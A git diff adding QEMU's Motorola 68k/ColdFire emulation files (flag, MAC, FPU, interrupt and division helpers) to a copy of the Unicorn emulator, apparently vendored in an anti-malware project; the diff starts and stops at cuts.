+ * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" + +#include "exec/helper-proto.h" + +#define SIGNBIT (1u << 31) + +M68kCPU *cpu_m68k_init(struct uc_struct *uc, const char *cpu_model) +{ + M68kCPU *cpu; + CPUM68KState *env; + ObjectClass *oc; + + oc = cpu_class_by_name(uc, TYPE_M68K_CPU, cpu_model); + if (oc == NULL) { + return NULL; + } + cpu = M68K_CPU(uc, object_new(uc, object_class_get_name(oc))); + env = &cpu->env; + + register_m68k_insns(env); + + object_property_set_bool(uc, OBJECT(cpu), true, "realized", NULL); + + return cpu; +} + +void cpu_m68k_flush_flags(CPUM68KState *env, int cc_op) +{ + M68kCPU *cpu = m68k_env_get_cpu(env); + int flags; + uint32_t src; + uint32_t dest; + uint32_t tmp; + +#define HIGHBIT 0x80000000u + +#define SET_NZ(x) do { \ + if ((x) == 0) \ + flags |= CCF_Z; \ + else if ((int32_t)(x) < 0) \ + flags |= CCF_N; \ + } while (0) + +#define SET_FLAGS_SUB(type, utype) do { \ + SET_NZ((type)dest); \ + tmp = dest + src; \ + if ((utype) tmp < (utype) src) \ + flags |= CCF_C; \ + if ((1u << (sizeof(type) * 8 - 1)) & (tmp ^ dest) & (tmp ^ src)) \ + flags |= CCF_V; \ + } while (0) + + flags = 0; + src = env->cc_src; + dest = env->cc_dest; + switch (cc_op) { + case CC_OP_FLAGS: + flags = dest; + break; + case CC_OP_LOGIC: + SET_NZ(dest); + break; + case CC_OP_ADD: + SET_NZ(dest); + if (dest < src) + flags |= CCF_C; + tmp = dest - src; + if (HIGHBIT & (src ^ dest) & ~(tmp ^ src)) + flags |= CCF_V; + break; + case CC_OP_SUB: + SET_FLAGS_SUB(int32_t, uint32_t); + break; + case CC_OP_CMPB: + SET_FLAGS_SUB(int8_t, uint8_t); + break; + case CC_OP_CMPW: + SET_FLAGS_SUB(int16_t, uint16_t); + break; + case CC_OP_ADDX: + SET_NZ(dest); + if (dest <= src) + flags |= CCF_C; + tmp = dest - src - 1; + if (HIGHBIT & (src ^ dest) & ~(tmp ^ src)) + flags |= CCF_V; + break; + case CC_OP_SUBX: + SET_NZ(dest); + tmp = dest + src + 1; + if (tmp <= src) + flags |= CCF_C; + if (HIGHBIT & (tmp ^ dest) & (tmp ^ src)) + flags |= CCF_V; + break; + case CC_OP_SHIFT: + SET_NZ(dest); + if (src) + flags |= CCF_C; + break; + default: + cpu_abort(CPU(cpu), "Bad CC_OP %d", cc_op); + } + env->cc_op = CC_OP_FLAGS; + env->cc_dest = flags; +} + +void HELPER(movec)(CPUM68KState *env, uint32_t reg, uint32_t val) +{ + switch (reg) { + case 0x02: /* CACR */ + env->cacr = val; + m68k_switch_sp(env); + break; + case 0x04: case 0x05: case 0x06: case 0x07: /* ACR[0-3] */ + /* TODO: Implement Access Control Registers. */ + break; + case 0x801: /* VBR */ + env->vbr = val; + break; + /* TODO: Implement control registers. */ + default: + qemu_log("Unimplemented control register write 0x%x = 0x%x\n", + reg, val); + helper_raise_exception(env, EXCP_UNSUPPORTED); + } +} + +void HELPER(set_macsr)(CPUM68KState *env, uint32_t val) +{ + uint32_t acc; + int8_t exthigh; + uint8_t extlow; + uint64_t regval; + int i; + if ((env->macsr ^ val) & (MACSR_FI | MACSR_SU)) { + for (i = 0; i < 4; i++) { + regval = env->macc[i]; + exthigh = regval >> 40; + if (env->macsr & MACSR_FI) { + acc = regval >> 8; + extlow = regval; + } else { + acc = regval; + extlow = regval >> 32; + } + if (env->macsr & MACSR_FI) { + regval = (((uint64_t)acc) << 8) | extlow; + regval |= ((uint64_t)((int64_t)exthigh)) << 40; + } else if (env->macsr & MACSR_SU) { + regval = acc | (((int64_t)extlow) << 32); + regval |= ((uint64_t)((int64_t)exthigh)) << 40; + } else { + regval = acc | (((uint64_t)extlow) << 32); + regval |= ((uint64_t)(uint8_t)exthigh) << 40; + } + env->macc[i] = regval; + } + } + env->macsr = val; +} + +void m68k_switch_sp(CPUM68KState *env) +{ + int new_sp; + + env->sp[env->current_sp] = env->aregs[7]; + new_sp = (env->sr & SR_S && env->cacr & M68K_CACR_EUSP) + ? M68K_SSP : M68K_USP; + env->aregs[7] = env->sp[new_sp]; + env->current_sp = new_sp; +} + +#if defined(CONFIG_USER_ONLY) + +int m68k_cpu_handle_mmu_fault(CPUState *cs, vaddr address, int rw, + int mmu_idx) +{ + M68kCPU *cpu = M68K_CPU(cs); + + cs->exception_index = EXCP_ACCESS; + cpu->env.mmu.ar = address; + return 1; +} + +#else + +/* MMU */ + +/* TODO: This will need fixing once the MMU is implemented. */ +hwaddr m68k_cpu_get_phys_page_debug(CPUState *cs, vaddr addr) +{ + return addr; +} + +int m68k_cpu_handle_mmu_fault(CPUState *cs, vaddr address, int rw, + int mmu_idx) +{ + int prot; + + address &= TARGET_PAGE_MASK; + prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; + tlb_set_page(cs, address, address, prot, mmu_idx, TARGET_PAGE_SIZE); + return 0; +} + +/* Notify CPU of a pending interrupt. Prioritization and vectoring should + be handled by the interrupt controller. Real hardware only requests + the vector when the interrupt is acknowledged by the CPU. For + simplicitly we calculate it when the interrupt is signalled. */ +void m68k_set_irq_level(M68kCPU *cpu, int level, uint8_t vector) +{ + CPUState *cs = CPU(cpu); + CPUM68KState *env = &cpu->env; + + env->pending_level = level; + env->pending_vector = vector; + if (level) { + cpu_interrupt(cs, CPU_INTERRUPT_HARD); + } else { + cpu_reset_interrupt(cs, CPU_INTERRUPT_HARD); + } +} + +#endif + +uint32_t HELPER(bitrev)(uint32_t x) +{ + x = ((x >> 1) & 0x55555555u) | ((x << 1) & 0xaaaaaaaau); + x = ((x >> 2) & 0x33333333u) | ((x << 2) & 0xccccccccu); + x = ((x >> 4) & 0x0f0f0f0fu) | ((x << 4) & 0xf0f0f0f0u); + return bswap32(x); +} + +uint32_t HELPER(ff1)(uint32_t x) +{ + int n; + for (n = 32; x; n--) + x >>= 1; + return n; +} + +uint32_t HELPER(sats)(uint32_t val, uint32_t ccr) +{ + /* The result has the opposite sign to the original value. */ + if (ccr & CCF_V) + val = (((int32_t)val) >> 31) ^ SIGNBIT; + return val; +} + +uint32_t HELPER(subx_cc)(CPUM68KState *env, uint32_t op1, uint32_t op2) +{ + uint32_t res; + uint32_t old_flags; + + old_flags = env->cc_dest; + if (env->cc_x) { + env->cc_x = (op1 <= op2); + env->cc_op = CC_OP_SUBX; + res = op1 - (op2 + 1); + } else { + env->cc_x = (op1 < op2); + env->cc_op = CC_OP_SUB; + res = op1 - op2; + } + env->cc_dest = res; + env->cc_src = op2; + cpu_m68k_flush_flags(env, env->cc_op); + /* !Z is sticky. */ + env->cc_dest &= (old_flags | ~CCF_Z); + return res; +} + +uint32_t HELPER(addx_cc)(CPUM68KState *env, uint32_t op1, uint32_t op2) +{ + uint32_t res; + uint32_t old_flags; + + old_flags = env->cc_dest; + if (env->cc_x) { + res = op1 + op2 + 1; + env->cc_x = (res <= op2); + env->cc_op = CC_OP_ADDX; + } else { + res = op1 + op2; + env->cc_x = (res < op2); + env->cc_op = CC_OP_ADD; + } + env->cc_dest = res; + env->cc_src = op2; + cpu_m68k_flush_flags(env, env->cc_op); + /* !Z is sticky. */ + env->cc_dest &= (old_flags | ~CCF_Z); + return res; +} + +uint32_t HELPER(xflag_lt)(uint32_t a, uint32_t b) +{ + return a < b; +} + +void HELPER(set_sr)(CPUM68KState *env, uint32_t val) +{ + env->sr = val & 0xffff; + m68k_switch_sp(env); +} + +uint32_t HELPER(shl_cc)(CPUM68KState *env, uint32_t val, uint32_t shift) +{ + uint32_t result; + uint32_t cf; + + shift &= 63; + if (shift == 0) { + result = val; + cf = env->cc_src & CCF_C; + } else if (shift < 32) { + result = val << shift; + cf = (val >> (32 - shift)) & 1; + } else if (shift == 32) { + result = 0; + cf = val & 1; + } else /* shift > 32 */ { + result = 0; + cf = 0; + } + env->cc_src = cf; + env->cc_x = (cf != 0); + env->cc_dest = result; + return result; +} + +uint32_t HELPER(shr_cc)(CPUM68KState *env, uint32_t val, uint32_t shift) +{ + uint32_t result; + uint32_t cf; + + shift &= 63; + if (shift == 0) { + result = val; + cf = env->cc_src & CCF_C; + } else if (shift < 32) { + result = val >> shift; + cf = (val >> (shift - 1)) & 1; + } else if (shift == 32) { + result = 0; + cf = val >> 31; + } else /* shift > 32 */ { + result = 0; + cf = 0; + } + env->cc_src = cf; + env->cc_x = (cf != 0); + env->cc_dest = result; + return result; +} + +uint32_t HELPER(sar_cc)(CPUM68KState *env, uint32_t val, uint32_t shift) +{ + uint32_t result; + uint32_t cf; + + shift &= 63; + if (shift == 0) { + result = val; + cf = (env->cc_src & CCF_C) != 0; + } else if (shift < 32) { + result = (int32_t)val >> shift; + cf = (val >> (shift - 1)) & 1; + } else /* shift >= 32 */ { + result = (int32_t)val >> 31; + cf = val >> 31; + } + env->cc_src = cf; + env->cc_x = cf; + env->cc_dest = result; + return result; +} + +/* FPU helpers. */ +uint32_t HELPER(f64_to_i32)(CPUM68KState *env, float64 val) +{ + return float64_to_int32(val, &env->fp_status); +} + +float32 HELPER(f64_to_f32)(CPUM68KState *env, float64 val) +{ + return float64_to_float32(val, &env->fp_status); +} + +float64 HELPER(i32_to_f64)(CPUM68KState *env, uint32_t val) +{ + return int32_to_float64(val, &env->fp_status); +} + +float64 HELPER(f32_to_f64)(CPUM68KState *env, float32 val) +{ + return float32_to_float64(val, &env->fp_status); +} + +float64 HELPER(iround_f64)(CPUM68KState *env, float64 val) +{ + return float64_round_to_int(val, &env->fp_status); +} + +float64 HELPER(itrunc_f64)(CPUM68KState *env, float64 val) +{ + return float64_trunc_to_int(val, &env->fp_status); +} + +float64 HELPER(sqrt_f64)(CPUM68KState *env, float64 val) +{ + return float64_sqrt(val, &env->fp_status); +} + +float64 HELPER(abs_f64)(float64 val) +{ + return float64_abs(val); +} + +float64 HELPER(chs_f64)(float64 val) +{ + return float64_chs(val); +} + +float64 HELPER(add_f64)(CPUM68KState *env, float64 a, float64 b) +{ + return float64_add(a, b, &env->fp_status); +} + +float64 HELPER(sub_f64)(CPUM68KState *env, float64 a, float64 b) +{ + return float64_sub(a, b, &env->fp_status); +} + +float64 HELPER(mul_f64)(CPUM68KState *env, float64 a, float64 b) +{ + return float64_mul(a, b, &env->fp_status); +} + +float64 HELPER(div_f64)(CPUM68KState *env, float64 a, float64 b) +{ + return float64_div(a, b, &env->fp_status); +} + +float64 HELPER(sub_cmp_f64)(CPUM68KState *env, float64 a, float64 b) +{ + /* ??? This may incorrectly raise exceptions. */ + /* ??? Should flush denormals to zero. */ + float64 res; + res = float64_sub(a, b, &env->fp_status); + if (float64_is_quiet_nan(res)) { + /* +/-inf compares equal against itself, but sub returns nan. */ + if (!float64_is_quiet_nan(a) + && !float64_is_quiet_nan(b)) { + res = float64_zero; + if (float64_lt_quiet(a, res, &env->fp_status)) + res = float64_chs(res); + } + } + return res; +} + +uint32_t HELPER(compare_f64)(CPUM68KState *env, float64 val) +{ + return float64_compare_quiet(val, float64_zero, &env->fp_status); +} + +/* MAC unit. */ +/* FIXME: The MAC unit implementation is a bit of a mess. Some helpers + take values, others take register numbers and manipulate the contents + in-place. */ +void HELPER(mac_move)(CPUM68KState *env, uint32_t dest, uint32_t src) +{ + uint32_t mask; + env->macc[dest] = env->macc[src]; + mask = MACSR_PAV0 << dest; + if (env->macsr & (MACSR_PAV0 << src)) + env->macsr |= mask; + else + env->macsr &= ~mask; +} + +uint64_t HELPER(macmuls)(CPUM68KState *env, uint32_t op1, uint32_t op2) +{ + int64_t product; + int64_t res; + + product = (uint64_t)op1 * op2; + res = ((int64_t)(((uint64_t)product) << 24)) >> 24; + if (res != product) { + env->macsr |= MACSR_V; + if (env->macsr & MACSR_OMC) { + /* Make sure the accumulate operation overflows. */ + if (product < 0) + res = ~(1ll << 50); + else + res = 1ll << 50; + } + } + return res; +} + +uint64_t HELPER(macmulu)(CPUM68KState *env, uint32_t op1, uint32_t op2) +{ + uint64_t product; + + product = (uint64_t)op1 * op2; + if (product & (0xffffffull << 40)) { + env->macsr |= MACSR_V; + if (env->macsr & MACSR_OMC) { + /* Make sure the accumulate operation overflows. */ + product = 1ll << 50; + } else { + product &= ((1ull << 40) - 1); + } + } + return product; +} + +uint64_t HELPER(macmulf)(CPUM68KState *env, uint32_t op1, uint32_t op2) +{ + uint64_t product; + uint32_t remainder; + + product = (uint64_t)op1 * op2; + if (env->macsr & MACSR_RT) { + remainder = product & 0xffffff; + product >>= 24; + if (remainder > 0x800000) + product++; + else if (remainder == 0x800000) + product += (product & 1); + } else { + product >>= 24; + } + return product; +} + +void HELPER(macsats)(CPUM68KState *env, uint32_t acc) +{ + int64_t tmp; + int64_t result; + tmp = env->macc[acc]; + result = ((int64_t)((uint64_t)tmp << 16) >> 16); + if (result != tmp) { + env->macsr |= MACSR_V; + } + if (env->macsr & MACSR_V) { + env->macsr |= MACSR_PAV0 << acc; + if (env->macsr & MACSR_OMC) { + /* The result is saturated to 32 bits, despite overflow occurring + at 48 bits. Seems weird, but that's what the hardware docs + say. */ + result = (result >> 63) ^ 0x7fffffff; + } + } + env->macc[acc] = result; +} + +void HELPER(macsatu)(CPUM68KState *env, uint32_t acc) +{ + uint64_t val; + + val = env->macc[acc]; + if (val & (0xffffull << 48)) { + env->macsr |= MACSR_V; + } + if (env->macsr & MACSR_V) { + env->macsr |= MACSR_PAV0 << acc; + if (env->macsr & MACSR_OMC) { + if (val > (1ull << 53)) + val = 0; + else + val = (1ull << 48) - 1; + } else { + val &= ((1ull << 48) - 1); + } + } + env->macc[acc] = val; +} + +void HELPER(macsatf)(CPUM68KState *env, uint32_t acc) +{ + int64_t sum; + int64_t result; + + sum = env->macc[acc]; + result = ((int64_t)((uint64_t)sum << 16)) >> 16; + if (result != sum) { + env->macsr |= MACSR_V; + } + if (env->macsr & MACSR_V) { + env->macsr |= MACSR_PAV0 << acc; + if (env->macsr & MACSR_OMC) { + result = (result >> 63) ^ 0x7fffffffffffll; + } + } + env->macc[acc] = result; +} + +void HELPER(mac_set_flags)(CPUM68KState *env, uint32_t acc) +{ + uint64_t val; + val = env->macc[acc]; + if (val == 0) { + env->macsr |= MACSR_Z; + } else if (val & (1ull << 47)) { + env->macsr |= MACSR_N; + } + if (env->macsr & (MACSR_PAV0 << acc)) { + env->macsr |= MACSR_V; + } + if (env->macsr & MACSR_FI) { + val = ((int64_t)val) >> 40; + if (val != 0 && val != -1) + env->macsr |= MACSR_EV; + } else if (env->macsr & MACSR_SU) { + val = ((int64_t)val) >> 32; + if (val != 0 && val != -1) + env->macsr |= MACSR_EV; + } else { + if ((val >> 32) != 0) + env->macsr |= MACSR_EV; + } +} + +void HELPER(flush_flags)(CPUM68KState *env, uint32_t cc_op) +{ + cpu_m68k_flush_flags(env, cc_op); +} + +uint32_t HELPER(get_macf)(CPUM68KState *env, uint64_t val) +{ + int rem; + uint32_t result; + + if (env->macsr & MACSR_SU) { + /* 16-bit rounding. */ + rem = val & 0xffffff; + val = (val >> 24) & 0xffffu; + if (rem > 0x800000) + val++; + else if (rem == 0x800000) + val += (val & 1); + } else if (env->macsr & MACSR_RT) { + /* 32-bit rounding. */ + rem = val & 0xff; + val >>= 8; + if (rem > 0x80) + val++; + else if (rem == 0x80) + val += (val & 1); + } else { + /* No rounding. */ + val >>= 8; + } + if (env->macsr & MACSR_OMC) { + /* Saturate. */ + if (env->macsr & MACSR_SU) { + if (val != (uint16_t) val) { + result = ((val >> 63) ^ 0x7fff) & 0xffff; + } else { + result = val & 0xffff; + } + } else { + if (val != (uint32_t)val) { + result = ((uint32_t)(val >> 63) & 0x7fffffff); + } else { + result = (uint32_t)val; + } + } + } else { + /* No saturation. */ + if (env->macsr & MACSR_SU) { + result = val & 0xffff; + } else { + result = (uint32_t)val; + } + } + return result; +} + +uint32_t HELPER(get_macs)(uint64_t val) +{ + if (val == (int32_t)val) { + return (int32_t)val; + } else { + return (val >> 61) ^ ~SIGNBIT; + } +} + +uint32_t HELPER(get_macu)(uint64_t val) +{ + if ((val >> 32) == 0) { + return (uint32_t)val; + } else { + return 0xffffffffu; + } +} + +uint32_t HELPER(get_mac_extf)(CPUM68KState *env, uint32_t acc) +{ + uint32_t val; + val = env->macc[acc] & 0x00ff; + val = (env->macc[acc] >> 32) & 0xff00; + val |= (env->macc[acc + 1] << 16) & 0x00ff0000; + val |= (env->macc[acc + 1] >> 16) & 0xff000000; + return val; +} + +uint32_t HELPER(get_mac_exti)(CPUM68KState *env, uint32_t acc) +{ + uint32_t val; + val = (env->macc[acc] >> 32) & 0xffff; + val |= (env->macc[acc + 1] >> 16) & 0xffff0000; + return val; +} + +void HELPER(set_mac_extf)(CPUM68KState *env, uint32_t val, uint32_t acc) +{ + int64_t res; + int32_t tmp; + res = env->macc[acc] & 0xffffffff00ull; + tmp = (int16_t)(val & 0xff00); + res |= ((uint64_t)((int64_t)tmp)) << 32; + res |= val & 0xff; + env->macc[acc] = res; + res = env->macc[acc + 1] & 0xffffffff00ull; + tmp = (val & 0xff000000); + res |= ((uint64_t)((int64_t)tmp)) << 16; + res |= (val >> 16) & 0xff; + env->macc[acc + 1] = res; +} + +void HELPER(set_mac_exts)(CPUM68KState *env, uint32_t val, uint32_t acc) +{ + int64_t res; + int32_t tmp; + res = (uint32_t)env->macc[acc]; + tmp = (int16_t)val; + res |= ((uint64_t)((int64_t)tmp)) << 32; + env->macc[acc] = res; + res = (uint32_t)env->macc[acc + 1]; + tmp = val & 0xffff0000; + res |= ((uint64_t)((int64_t)tmp)) << 16; + env->macc[acc + 1] = res; +} + +void HELPER(set_mac_extu)(CPUM68KState *env, uint32_t val, uint32_t acc) +{ + uint64_t res; + res = (uint32_t)env->macc[acc]; + res |= ((uint64_t)(val & 0xffff)) << 32; + env->macc[acc] = res; + res = (uint32_t)env->macc[acc + 1]; + res |= (uint64_t)(val & 0xffff0000) << 16; + env->macc[acc + 1] = res; +} + +void m68k_cpu_exec_enter(CPUState *cs) +{ + M68kCPU *cpu = M68K_CPU(cs->uc, cs); + CPUM68KState *env = &cpu->env; + + env->cc_op = CC_OP_FLAGS; + env->cc_dest = env->sr & 0xf; + env->cc_x = (env->sr >> 4) & 1; +} + +void m68k_cpu_exec_exit(CPUState *cs) +{ + M68kCPU *cpu = M68K_CPU(cs->uc, cs); + CPUM68KState *env = &cpu->env; + + cpu_m68k_flush_flags(env, env->cc_op); + env->cc_op = CC_OP_FLAGS; + env->sr = (env->sr & 0xffe0) | env->cc_dest | (env->cc_x << 4); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/helper.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/helper.h new file mode 100644 index 0000000..caaadb3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/helper.h @@ -0,0 +1,52 @@ +DEF_HELPER_4(uc_tracecode, void, i32, i32, ptr, i64) + +DEF_HELPER_1(bitrev, i32, i32) +DEF_HELPER_1(ff1, i32, i32) +DEF_HELPER_2(sats, i32, i32, i32) +DEF_HELPER_2(divu, void, env, i32) +DEF_HELPER_2(divs, void, env, i32) +DEF_HELPER_3(addx_cc, i32, env, i32, i32) +DEF_HELPER_3(subx_cc, i32, env, i32, i32) +DEF_HELPER_3(shl_cc, i32, env, i32, i32) +DEF_HELPER_3(shr_cc, i32, env, i32, i32) +DEF_HELPER_3(sar_cc, i32, env, i32, i32) +DEF_HELPER_2(xflag_lt, i32, i32, i32) +DEF_HELPER_2(set_sr, void, env, i32) +DEF_HELPER_3(movec, void, env, i32, i32) + +DEF_HELPER_2(f64_to_i32, f32, env, f64) +DEF_HELPER_2(f64_to_f32, f32, env, f64) +DEF_HELPER_2(i32_to_f64, f64, env, i32) +DEF_HELPER_2(f32_to_f64, f64, env, f32) +DEF_HELPER_2(iround_f64, f64, env, f64) +DEF_HELPER_2(itrunc_f64, f64, env, f64) +DEF_HELPER_2(sqrt_f64, f64, env, f64) +DEF_HELPER_1(abs_f64, f64, f64) +DEF_HELPER_1(chs_f64, f64, f64) +DEF_HELPER_3(add_f64, f64, env, f64, f64) +DEF_HELPER_3(sub_f64, f64, env, f64, f64) +DEF_HELPER_3(mul_f64, f64, env, f64, f64) +DEF_HELPER_3(div_f64, f64, env, f64, f64) +DEF_HELPER_3(sub_cmp_f64, f64, env, f64, f64) +DEF_HELPER_2(compare_f64, i32, env, f64) + +DEF_HELPER_3(mac_move, void, env, i32, i32) +DEF_HELPER_3(macmulf, i64, env, i32, i32) +DEF_HELPER_3(macmuls, i64, env, i32, i32) +DEF_HELPER_3(macmulu, i64, env, i32, i32) +DEF_HELPER_2(macsats, void, env, i32) +DEF_HELPER_2(macsatu, void, env, i32) +DEF_HELPER_2(macsatf, void, env, i32) +DEF_HELPER_2(mac_set_flags, void, env, i32) +DEF_HELPER_2(set_macsr, void, env, i32) +DEF_HELPER_2(get_macf, i32, env, i64) +DEF_HELPER_1(get_macs, i32, i64) +DEF_HELPER_1(get_macu, i32, i64) +DEF_HELPER_2(get_mac_extf, i32, env, i32) +DEF_HELPER_2(get_mac_exti, i32, env, i32) +DEF_HELPER_3(set_mac_extf, void, env, i32, i32) +DEF_HELPER_3(set_mac_exts, void, env, i32, i32) +DEF_HELPER_3(set_mac_extu, void, env, i32, i32) + +DEF_HELPER_2(flush_flags, void, env, i32) +DEF_HELPER_2(raise_exception, void, env, i32) diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/m68k-qreg.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/m68k-qreg.h new file mode 100644 index 0000000..c224d5e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/m68k-qreg.h @@ -0,0 +1,11 @@ +enum { +#define DEFO32(name, offset) QREG_##name, +#define DEFR(name, reg, mode) QREG_##name, +#define DEFF64(name, offset) QREG_##name, + QREG_NULL, +#include "qregs.def" + TARGET_NUM_QREGS = 0x100 +#undef DEFO32 +#undef DEFR +#undef DEFF64 +}; diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/op_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/op_helper.c new file mode 100644 index 0000000..2686e98 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/op_helper.c @@ -0,0 +1,225 @@ +/* + * M68K helper routines + * + * Copyright (c) 2007 CodeSourcery + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ +#include "cpu.h" +#include "exec/helper-proto.h" +#include "exec/cpu_ldst.h" + +#if defined(CONFIG_USER_ONLY) + +void m68k_cpu_do_interrupt(CPUState *cs) +{ + cs->exception_index = -1; +} + +static inline void do_interrupt_m68k_hardirq(CPUM68KState *env) +{ +} + +#else + +extern int semihosting_enabled; + +/* Try to fill the TLB and return an exception if error. If retaddr is + NULL, it means that the function was called in C code (i.e. not + from generated code or from helper.c) */ +void tlb_fill(CPUState *cs, target_ulong addr, int is_write, int mmu_idx, + uintptr_t retaddr) +{ + int ret; + + ret = m68k_cpu_handle_mmu_fault(cs, addr, is_write, mmu_idx); + if (unlikely(ret)) { + if (retaddr) { + /* now we have a real cpu fault */ + cpu_restore_state(cs, retaddr); + } + cpu_loop_exit(cs); + } +} + +static void do_rte(CPUM68KState *env) +{ + uint32_t sp; + uint32_t fmt; + + sp = env->aregs[7]; + fmt = cpu_ldl_kernel(env, sp); + env->pc = cpu_ldl_kernel(env, sp + 4); + sp |= (fmt >> 28) & 3; + env->sr = fmt & 0xffff; + m68k_switch_sp(env); + env->aregs[7] = sp + 8; +} + +static void do_interrupt_all(CPUM68KState *env, int is_hw) +{ + CPUState *cs = CPU(m68k_env_get_cpu(env)); + uint32_t sp; + uint32_t fmt; + uint32_t retaddr; + uint32_t vector; + + fmt = 0; + retaddr = env->pc; + + if (!is_hw) { + switch (cs->exception_index) { + case EXCP_RTE: + /* Return from an exception. */ + do_rte(env); + return; + case EXCP_HALT_INSN: + cs->halted = 1; + cs->exception_index = EXCP_HLT; + cpu_loop_exit(cs); + return; + } + if (cs->exception_index >= EXCP_TRAP0 + && cs->exception_index <= EXCP_TRAP15) { + /* Move the PC after the trap instruction. */ + retaddr += 2; + } + } + + vector = cs->exception_index << 2; + + sp = env->aregs[7]; + + fmt |= 0x40000000; + fmt |= (sp & 3) << 28; + fmt |= vector << 16; + fmt |= env->sr; + + env->sr |= SR_S; + if (is_hw) { + env->sr = (env->sr & ~SR_I) | (env->pending_level << SR_I_SHIFT); + env->sr &= ~SR_M; + } + m68k_switch_sp(env); + + /* ??? This could cause MMU faults. */ + sp &= ~3; + sp -= 4; + cpu_stl_kernel(env, sp, retaddr); + sp -= 4; + cpu_stl_kernel(env, sp, fmt); + env->aregs[7] = sp; + /* Jump to vector. */ + env->pc = cpu_ldl_kernel(env, env->vbr + vector); +} + +void m68k_cpu_do_interrupt(CPUState *cs) +{ + M68kCPU *cpu = M68K_CPU(cs->uc, cs); + CPUM68KState *env = &cpu->env; + + do_interrupt_all(env, 0); +} + +static inline void do_interrupt_m68k_hardirq(CPUM68KState *env) +{ + do_interrupt_all(env, 1); +} +#endif + +bool m68k_cpu_exec_interrupt(CPUState *cs, int interrupt_request) +{ + M68kCPU *cpu = M68K_CPU(cs->uc, cs); + CPUM68KState *env = &cpu->env; + + if (interrupt_request & CPU_INTERRUPT_HARD + && ((env->sr & SR_I) >> SR_I_SHIFT) < env->pending_level) { + /* Real hardware gets the interrupt vector via an IACK cycle + at this point. Current emulated hardware doesn't rely on + this, so we provide/save the vector when the interrupt is + first signalled. */ + cs->exception_index = env->pending_vector; + do_interrupt_m68k_hardirq(env); + return true; + } + return false; +} + +static void raise_exception(CPUM68KState *env, int tt) +{ + CPUState *cs = CPU(m68k_env_get_cpu(env)); + + cs->exception_index = tt; + cpu_loop_exit(cs); +} + +void HELPER(raise_exception)(CPUM68KState *env, uint32_t tt) +{ + raise_exception(env, tt); +} + +void HELPER(divu)(CPUM68KState *env, uint32_t word) +{ + uint32_t num; + uint32_t den; + uint32_t quot; + uint32_t rem; + uint32_t flags; + + num = env->div1; + den = env->div2; + /* ??? This needs to make sure the throwing location is accurate. */ + if (den == 0) { + raise_exception(env, EXCP_DIV0); + } + quot = num / den; + rem = num % den; + flags = 0; + if (word && quot > 0xffff) + flags |= CCF_V; + if (quot == 0) + flags |= CCF_Z; + else if ((int32_t)quot < 0) + flags |= CCF_N; + env->div1 = quot; + env->div2 = rem; + env->cc_dest = flags; +} + +void HELPER(divs)(CPUM68KState *env, uint32_t word) +{ + int32_t num; + int32_t den; + int32_t quot; + int32_t rem; + int32_t flags; + + num = env->div1; + den = env->div2; + if (den == 0) { + raise_exception(env, EXCP_DIV0); + } + quot = (int64_t)num / den; + rem = (int64_t)num % den; + flags = 0; + if (word && quot != (int16_t)quot) + flags |= CCF_V; + if (quot == 0) + flags |= CCF_Z; + else if (quot < 0) + flags |= CCF_N; + env->div1 = quot; + env->div2 = rem; + env->cc_dest = flags; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/qregs.def b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/qregs.def new file mode 100644 index 0000000..204663e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/qregs.def @@ -0,0 +1,11 @@ +DEFF64(FP_RESULT, fp_result) +DEFO32(PC, pc) +DEFO32(SR, sr) +DEFO32(CC_OP, cc_op) +DEFO32(CC_DEST, cc_dest) +DEFO32(CC_SRC, cc_src) +DEFO32(CC_X, cc_x) +DEFO32(DIV1, div1) +DEFO32(DIV2, div2) +DEFO32(MACSR, macsr) +DEFO32(MAC_MASK, mac_mask) diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/translate.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/translate.c new file mode 100644 index 0000000..7ada763 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/translate.c @@ -0,0 +1,3220 @@ +/* + * m68k translation + * + * Copyright (c) 2005-2007 CodeSourcery + * Written by Paul Brook + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "tcg-op.h" +#include "qemu/log.h" +#include "exec/cpu_ldst.h" + +#include "exec/helper-proto.h" +#include "exec/helper-gen.h" + +#include "exec/gen-icount.h" + +//#define DEBUG_DISPATCH 1 + +/* Fake floating point. */ +#define tcg_gen_mov_f64 tcg_gen_mov_i64 +#define tcg_gen_qemu_ldf64 tcg_gen_qemu_ld64 +#define tcg_gen_qemu_stf64 